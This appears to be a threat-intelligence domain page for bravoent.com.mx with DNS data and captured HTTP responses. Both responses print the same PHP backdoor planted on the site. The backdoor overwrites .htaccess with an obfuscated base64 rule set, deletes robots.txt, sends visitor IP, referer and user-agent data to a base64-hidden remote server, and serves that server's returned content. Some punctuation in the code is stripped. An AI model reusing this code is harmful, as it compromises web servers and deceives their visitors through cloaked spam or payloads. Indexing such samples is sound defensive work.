Help
RSS
API
Feed
Maltego
Contact
Domain > bravoent.com.mx
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
DNS Resolutions
Date
IP Address
2025-03-27
50.6.138.20
(
ClassC
)
Port 80
HTTP/1.1 200 OKDate: Thu, 27 Mar 2025 23:42:58 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charsetUTF-8 function h($url, $pf ) { $ch curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, h); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf ! ) { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ; } function h2() { if (file_exists(robots..txt)){ @unlink(robots..txt); } $htaccess ..htaccess; $content @base64_decode(PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+); if (file_exists($htaccess)) { $htaccess_content file_get_contents($htaccess); if ($content $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api base64_decode(aHR0cDovLzYxMDMtY2g0LXYyNjcuaW1nMjB5YWhvby5jb20); $paramsdomain isset($_SERVERHTTP_HOST) ? $_SERVERHTTP_HOST : $_SERVERSERVER_NAME; $paramsrequest_url $_SERVERREQUEST_URI; $paramsreferer isset($_SERVERHTTP_REFERER) ? $_SERVERHTTP_REFERER : ; $paramsagent isset($_SERVERHTTP_USER_AGENT) ? $_SERVERHTTP_USER_AGENT : ; $paramsip isset($_SERVERHTTP_VIA) ? $_SERVERHTTP_X_FORWARDED_FOR : $_SERVERREMOTE_ADDR; if($paramsip null) {$paramsip ;} $paramsprotocol isset($_SERVERHTTPS) ? https:// : http://; $paramslanguage isset($_SERVERHTTP_ACCEPT_LANGUAGE) ? $_SERVERHTTP_ACCEPT_LANGUAGE : ; if (isset($_REQUESTparams)) {$paramsapi $api;print_r($params);die();} h2(); $try 0; while($try 3) { $content h($api, $params); $content @gzuncompress(base64_decode($content)); $data_array @preg_split(/\|/si, $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data array_pop($data_array); $data base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
Port 443
HTTP/1.1 200 OKDate: Thu, 27 Mar 2025 23:42:58 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charsetUTF-8 function h($url, $pf ) { $ch curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, h); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf ! ) { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ; } function h2() { if (file_exists(robots..txt)){ @unlink(robots..txt); } $htaccess ..htaccess; $content @base64_decode(PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+); if (file_exists($htaccess)) { $htaccess_content file_get_contents($htaccess); if ($content $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api base64_decode(aHR0cDovLzYxMDMtY2g0LXYyNjcuaW1nMjB5YWhvby5jb20); $paramsdomain isset($_SERVERHTTP_HOST) ? $_SERVERHTTP_HOST : $_SERVERSERVER_NAME; $paramsrequest_url $_SERVERREQUEST_URI; $paramsreferer isset($_SERVERHTTP_REFERER) ? $_SERVERHTTP_REFERER : ; $paramsagent isset($_SERVERHTTP_USER_AGENT) ? $_SERVERHTTP_USER_AGENT : ; $paramsip isset($_SERVERHTTP_VIA) ? $_SERVERHTTP_X_FORWARDED_FOR : $_SERVERREMOTE_ADDR; if($paramsip null) {$paramsip ;} $paramsprotocol isset($_SERVERHTTPS) ? https:// : http://; $paramslanguage isset($_SERVERHTTP_ACCEPT_LANGUAGE) ? $_SERVERHTTP_ACCEPT_LANGUAGE : ; if (isset($_REQUESTparams)) {$paramsapi $api;print_r($params);die();} h2(); $try 0; while($try 3) { $content h($api, $params); $content @gzuncompress(base64_decode($content)); $data_array @preg_split(/\|/si, $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data array_pop($data_array); $data base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]